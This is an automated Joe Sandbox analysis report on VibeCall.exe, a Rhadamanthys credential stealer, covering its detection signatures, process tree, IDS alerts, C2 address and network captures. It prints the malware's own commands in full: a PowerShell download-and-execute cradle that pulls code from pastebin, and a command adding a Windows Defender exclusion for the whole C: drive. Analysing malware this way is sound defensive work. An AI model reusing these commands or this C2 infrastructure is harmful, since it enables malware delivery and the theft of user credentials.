Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name:VibeCall.exe
Analysis ID:1626653
MD5:fd33e9b2d26a30171852031ae407bef5
SHA1:646d2c13230c5b64cf0e518996d5ce9883a53e26
SHA256:b63367bd7da5aad9afef5e7531cac4561c8a671fd2270ade14640cf03849bf52
Tags:CrazyEvilexeNoLogsFebruaryuser-g0njxa
Infos:

Detection

RHADAMANTHYS
Score:99
Range:0 - 100
Confidence:100%

Compliance

Score:63
Range:0 - 100

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files to the document folder of the user
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SIDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • VibeCall.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: FD33E9B2D26A30171852031AE407BEF5)
    • powershell.exe (PID: 7672 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7812 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4040 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 7348 cmdline: "C:\Users\user\Documents\aisolution_vibecall_a.exe" MD5: 6628422BEF4B51DC34FA30EEA184E2BE)
      • WerFault.exe (PID: 5768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 252 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 4020 cmdline: "C:\Users\user\Downloads\contry_solution_vibecall_e.exe" MD5: A43F99E94BC661D7B8C675A2C58DA107)
      • fontdrvhost.exe (PID: 2124 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 7732 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 7948 cmdline: C:\Windows\system32\WerFault.exe -u -p 7732 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 1144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 4476 cmdline: "C:\Users\user\Documents\soundsolution_vibecall_c.exe" MD5: 3AFA1599179F4EEA93CC1E38D1480731)
      • OpenWith.exe (PID: 7904 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
        • OpenWith.exe (PID: 6692 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
      • WerFault.exe (PID: 7968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 580 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 576 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • videosolution_vibecall_b.exe (PID: 3052 cmdline: "C:\Users\user\Downloads\videosolution_vibecall_b.exe" MD5: 999041299FD11008A384B66BCAEE5BD4)
      • fontdrvhost.exe (PID: 6708 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 1784 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 7296 cmdline: C:\Windows\system32\WerFault.exe -u -p 1784 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000021.00000003.2772159499.0000021CF055C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000021.00000003.2774763496.0000021CF055C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000022.00000002.2777497485.0000000002D10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000E.00000003.2579586240.0000000002A90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.3.soundsolution_vibecall_c.exe.4530000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              15.3.videosolution_vibecall_b.exe.3ca0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                25.3.OpenWith.exe.4af0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  20.3.fontdrvhost.exe.56f0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    15.3.videosolution_vibecall_b.exe.3ca0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 16 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: PowerShell Download and Execution Cradles
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 7812, ProcessName: powershell.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7672, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 7812, ProcessName: powershell.exe
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 7812, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7672, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 7812, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7440, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7672, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T17:52:04.220379+010028548242Potentially Bad Traffic98.142.253.2329364192.168.2.458788TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T17:50:50.046781+010028033053Unknown Traffic192.168.2.458496188.114.97.380TCP
                      2025-02-28T17:50:55.706359+010028033053Unknown Traffic192.168.2.458497188.114.97.380TCP
                      2025-02-28T17:51:02.291467+010028033053Unknown Traffic192.168.2.458498188.114.97.380TCP
                      2025-02-28T17:51:03.853138+010028033053Unknown Traffic192.168.2.458499172.67.74.15280TCP
                      2025-02-28T17:51:04.353150+010028033053Unknown Traffic192.168.2.458500208.95.112.180TCP
                      2025-02-28T17:51:08.463038+010028033053Unknown Traffic192.168.2.458502188.114.97.380TCP
                      2025-02-28T17:51:09.228182+010028033053Unknown Traffic192.168.2.458503172.67.74.15280TCP
                      2025-02-28T17:51:09.509424+010028033053Unknown Traffic192.168.2.458500208.95.112.180TCP
                      2025-02-28T17:51:15.634473+010028033053Unknown Traffic192.168.2.458531172.67.74.15280TCP
                      2025-02-28T17:51:15.759462+010028033053Unknown Traffic192.168.2.458500208.95.112.180TCP
                      2025-02-28T17:51:22.572168+010028033053Unknown Traffic192.168.2.458574172.67.74.15280TCP
                      2025-02-28T17:51:22.665798+010028033053Unknown Traffic192.168.2.458500208.95.112.180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T17:51:44.332502+010028548021Domain Observed Used for C2 Detected79.141.162.1885101192.168.2.458698TCP
                      2025-02-28T17:51:49.803035+010028548021Domain Observed Used for C2 Detected98.142.253.2329364192.168.2.458736TCP
                      2025-02-28T17:51:59.496618+010028548021Domain Observed Used for C2 Detected45.129.185.241896192.168.2.458787TCP
                      2025-02-28T17:52:04.220379+010028548021Domain Observed Used for C2 Detected98.142.253.2329364192.168.2.458788TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-28T17:50:32.200663+010018100002Potentially Bad Traffic192.168.2.449739104.20.3.235443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 15.3.videosolution_vibecall_b.exe.15f0000.8.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

                      Compliance

                      barindex
                      PE / OLE file has a valid certificate
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Uses secure TLS version for HTTPS connections
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Contains modern PE file flags such as dynamic base (ASLR) or NX
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Binary contains paths to debug symbols
                      Source: Binary string: wkernel32.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523616004.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2523508029.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2524137617.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2522441242.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522244799.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523064240.0000000003C60000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522855561.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2522441242.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522244799.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523064240.0000000003C60000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522855561.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2524137617.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523616004.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2523508029.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1767413045.00007FF6F5382000.00000002.00000001.01000000.00000003.sdmp
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp30_2_000001E3C5B00511
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp39_2_00000202BB280511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.162.188:5101 -> 192.168.2.4:58698
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:58736
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:58788
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.129.185.24:1896 -> 192.168.2.4:58787
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58501 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58501
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58505 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58505
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58542
                      Source: global trafficTCP traffic: 192.168.2.4:58501 -> 147.45.60.20:5000
                      Source: global trafficTCP traffic: 192.168.2.4:58494 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 16:50:49 GMTContent-Type: application/octet-streamContent-Length: 16307410Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:18:16 GMTETag: "67bf1498-f8d4d2"Cache-Control: max-age=14400CF-Cache-Status: REVALIDATEDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cqbaTb2X1BDRoetq3%2F8hkQv%2Fgm0S4GjSDG9pDKjwOuJNr1EGQkWphhiRaGW2L3CW8cGE6iKok%2B0YgAK6AV2bfx9Edmg81SYTcj%2BigLuNy41tq9ALZUPa6bRUcRDEQ2IPdrYsf9nQ76b91d8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191ea751dff4332-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1702&rtt_var=851&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 46 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 16:50:55 GMTContent-Type: application/octet-streamContent-Length: 16308031Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:38:33 GMTETag: "67bf1959-f8d73f"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dmoN8LVQ4hAigDP53EWZY1%2B7vHF2%2FPOIqJY7vsVhExyuNbg6yOTmAlodQq%2FyEYtX%2BSYFJbuekjdJ1Auk5sIye2aZbqUvz68NqASS4kJ2B1jB%2FM8pORZSLDSoqMMULhwxjLFXWNxrJRpMiTI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191ea973e51dafc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=2002&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 